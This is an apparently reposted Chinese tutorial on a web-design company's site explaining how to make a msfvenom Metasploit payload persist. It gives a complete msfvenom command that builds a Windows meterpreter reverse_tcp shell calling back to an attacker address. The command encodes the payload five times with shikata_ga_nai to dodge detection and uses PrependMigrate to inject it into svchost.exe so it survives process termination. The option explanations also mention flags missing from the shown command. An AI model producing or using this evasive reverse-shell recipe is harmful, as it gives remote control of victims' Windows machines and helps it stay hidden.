msfvenompayload的可持續(xù)化怎么實(shí)現(xiàn)

本篇內(nèi)容介紹了“msfvenom payload的可持續(xù)化怎么實(shí)現(xiàn)”的有關(guān)知識，在實(shí)際案例的操作過程中，不少人都會遇到這樣的困境，接下來就讓小編帶領(lǐng)大家學(xué)習(xí)一下如何處理這些情況吧！希望大家仔細(xì)閱讀，能夠?qū)W有所成！

創(chuàng)新互聯(lián)是一家集網(wǎng)站建設(shè),營山企業(yè)網(wǎng)站建設(shè),營山品牌網(wǎng)站建設(shè),網(wǎng)站定制,營山網(wǎng)站建設(shè)報(bào)價,網(wǎng)絡(luò)營銷,網(wǎng)絡(luò)優(yōu)化,營山網(wǎng)站推廣為一體的創(chuàng)新建站企業(yè)，幫助傳統(tǒng)企業(yè)提升企業(yè)形象加強(qiáng)企業(yè)競爭力?？沙浞譂M足這一群體相比中小企業(yè)更為豐富、高端、多元的互聯(lián)網(wǎng)需求。同時我們時刻保持專業(yè)、時尚、前沿，時刻以成就客戶成長自我，堅(jiān)持不斷學(xué)習(xí)、思考、沉淀、凈化自己，讓我們?yōu)楦嗟钠髽I(yè)打造出實(shí)用型網(wǎng)站。

一般來說使用msfvenom生成的payload會單獨(dú)開啟一個進(jìn)程，這種進(jìn)程很容易被發(fā)現(xiàn)和關(guān)閉，在后期想做持久化的時候只能再使用migrate進(jìn)行。

其實(shí)在生成payload時可直接使用如下命令，生成的payload會直接注入到指定進(jìn)程中。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -e x86/shikata_ga_nai -b "\x00" -i 5 -a x86 --platform win PrependMigrate=true

生成的shell程序執(zhí)行后會啟動兩個進(jìn)程shell.exe和svchost.exe，關(guān)閉其中一個不會影響會話狀態(tài)。唯一美中不足的是svchost.exe不是system32目錄下的。

在上面的生成payload參數(shù)中：

（1）PrependMigrate=true PrependMigrateProc=svchost.exe 使這個程序默認(rèn)會遷移到svchost.exe進(jìn)程，自己測試的時候不建議到這個進(jìn)程而是其他的持久進(jìn)程。

（2）使用-p指定使用的攻擊載荷模塊，使用-e指定使用x86/shikata_ga_nai編碼器，使用-f選項(xiàng)告訴MSF編碼器輸出格式為exe，-o選項(xiàng)指定輸出的文件名為payload.exe，保存在根目錄下。

“msfvenom payload的可持續(xù)化怎么實(shí)現(xiàn)”的內(nèi)容就介紹到這里了，感謝大家的閱讀。如果想了解更多行業(yè)相關(guān)的知識可以關(guān)注創(chuàng)新互聯(lián)網(wǎng)站，小編將為大家輸出更多高質(zhì)量的實(shí)用文章！

文章題目：msfvenompayload的可持續(xù)化怎么實(shí)現(xiàn)
文章來源：http://muchs.cn/article0/ijoiio.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供網(wǎng)站改版、網(wǎng)站策劃、企業(yè)網(wǎng)站制作、營銷型網(wǎng)站建設(shè)、小程序開發(fā)、網(wǎng)站維護(hù)

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請盡快告知，我們將會在第一時間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時需注明來源： 創(chuàng)新互聯(lián)